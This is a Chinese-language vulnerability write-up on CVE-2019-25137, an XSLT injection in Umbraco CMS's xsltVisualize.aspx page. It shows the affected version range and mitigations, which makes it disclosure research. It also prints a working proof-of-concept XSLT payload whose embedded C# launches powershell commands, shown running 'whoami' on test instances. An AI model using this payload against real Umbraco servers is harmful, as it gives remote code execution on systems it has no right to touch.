CVE-2019-25137 是 Umbraco CMS 中的一个 XSLT 注入漏洞。该漏洞存在于 XSLT(可扩展样式表语言转换)可视化器网页中。此网页的易受攻击 URI 是 /umbraco/developer/Xslt/xsltVisualize.aspx。
成功利用 XSLT 可视化器可导致在目标系统上执行 C# 代码。要利用此漏洞,用户需要拥有 Umbraco CMS 的合法管理员凭据。
CVE-2019-25137 的概念验证使用了 msxsl:script 元素。该元素允许在 XSLT 转换中使用其他编程语言,例如 C#。
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "<additional arguments>"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "<Can be powershell or cmd>"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } </msxsl:script>
<xsl:template match="/">
<xsl:value-of select="csharp_user:xml()"/>
</xsl:template>
</xsl:stylesheet>
该 XSLT 负载将尝试执行以下 C# 代码。
string cmd = "<additional arguments>";
System.Diagnostics.Process proc = new System.Diagnostics.Process();
proc.StartInfo.FileName = "<Can be powershell or cmd>";
proc.StartInfo.Arguments = cmd;
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.Start();
string output = proc.StandardOutput.ReadToEnd();
return output;
C# 代码分解为以下语句——所有定义均记录在 Microsoft 的网站上。
| Function | Overview |
|---|---|
| System.Diagnostics.Process proc | 提供对本地和远程进程的访问,并允许用户启动和停止本地系统进程,此处该进程名为 "proc"。 |
| proc.StartInfo.FileName | 定义用户想要启动的应用程序名称(powershell 或 cmd)。 |
| proc.StartInfo.Arguments | 定义 FileName 可能需要的任何附加变量。 |
| proc.StartInfo.UseShellExecute | 一个指示是否使用操作系统 shell 启动进程的值,由于使用 powershell 或 cmd,此值设置为 false。 |
| proc.StartInfo.RedirectStandardOutput | 一个指示应用程序的输出是否写入 StandardOutput 流的值,此值设置为 true。 |
| proc.Start() | 启动 "proc" 进程资源并将其与 Process 组件关联。 |
| string output = proc.StandardOutput.ReadToEnd() | 对 "proc" 执行同步读取操作,并将其重定向到 "output" 变量。 |
由于 Umbraco 是一个开源 CMS,我从其网站获取了不同的安装版本,以确定哪些新旧版本可能仍存在 xsltVisualize.aspx。

分析表明,xsltVisualize.aspx 文件存在于 Umbraco CMS 4.11.8 至 7.15.10 版本中。该文件和整个 Development 文件夹在 8.0.0 及以上版本中不再存在。

为了证明最早版本也容易受到 CVE-2019-25137 的攻击,我搭建了一个 Umbraco 4.11.8 的测试实例。

将 Umbraco CMS 4.11.8 的 xsltVisualize.aspx 与 Umbraco CMS 7.12.4 版本中的文件进行比较,可以看出虽然存在少量差异,但网页功能是相同的。

要测试该漏洞利用,用户需要在 xsltSelection 字段中提交负载。

使用之前提供的负载,我能够实现远程代码执行,这表明该版本也存在漏洞。下图演示了 whoami 的执行。
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "whoami"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "powershell"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } </msxsl:script>
<xsl:template match="/">
<xsl:value-of select="csharp_user:xml()"/>
</xsl:template>
</xsl:stylesheet>

为了证明包含 xsltVisualize.aspx 的最新 Umbraco 版本也存在漏洞,我搭建了一个 Umbraco 7.15.10 的测试实例。

将 Umbraco CMS 7.15.10 的 xsltVisualize.aspx 与 Umbraco CMS 7.12.4 版本中的文件进行比较,可以看出它们是相同的。

访问 /umbraco/developer/Xslt/xsltVisualize.aspx URI 表明该文件确实存在。

使用之前提供的相同负载,我再次实现了远程代码执行,这表明该版本也存在漏洞。下图演示了 whoami 的执行。
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "whoami"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "powershell"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } </msxsl:script>
<xsl:template match="/">
<xsl:value-of select="csharp_user:xml()"/>
</xsl:template>
</xsl:stylesheet>

这些示例表明,CVE-2019-25137 存在于除 7.12.4 之外的 Umbraco 版本中。4.11.8 和 7.15.10 之间的所有版本都包含易受攻击的网页,因此应包含在 CVE 更新中。可以通过移除对 xsltVisualize.aspx 文件的访问或更新到最新版本的 Umbraco 来缓解 CVE-2019-25137。
原始 CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25137
Umbraco 发布日期 - https://our.umbraco.com/download/releases/774
Umbraco 版本 - https://our.umbraco.com/download/releases
XSLT 定义 - https://en.wikipedia.org/wiki/XSLT